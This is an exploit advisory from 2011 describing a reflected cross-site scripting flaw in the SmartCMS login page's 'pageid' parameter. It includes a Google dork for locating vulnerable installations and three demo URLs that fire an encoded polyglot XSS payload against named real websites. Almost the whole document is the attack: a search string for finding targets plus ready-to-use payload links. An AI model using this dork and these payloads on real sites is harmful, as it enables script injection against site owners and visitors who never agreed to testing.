# Exploit Title: SmartCMS Cross Site Scripting
# Google Dorks: intext:"powered by SmartCMS"
# Date: 25.08.2011
# Author: Sony
# Software Link: http://www.smartwebsites.com.cy/
# Version: all version
# POC: http://st2tea.blogspot.com/2011/08/smartcms-cross-site-scripting.html

..................................................................

XSS in the Login Page.

http://server/userauthentication.php?action=login&lang=en&pageid=[XSS]

Our code:

http://codepad.org/mMQfVBcw

Demo:

1.

http://www.aigaia.com.cy/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

2.

http://www.apollofundcyprus.com/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

3.

http://www.charilaoulab.com/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E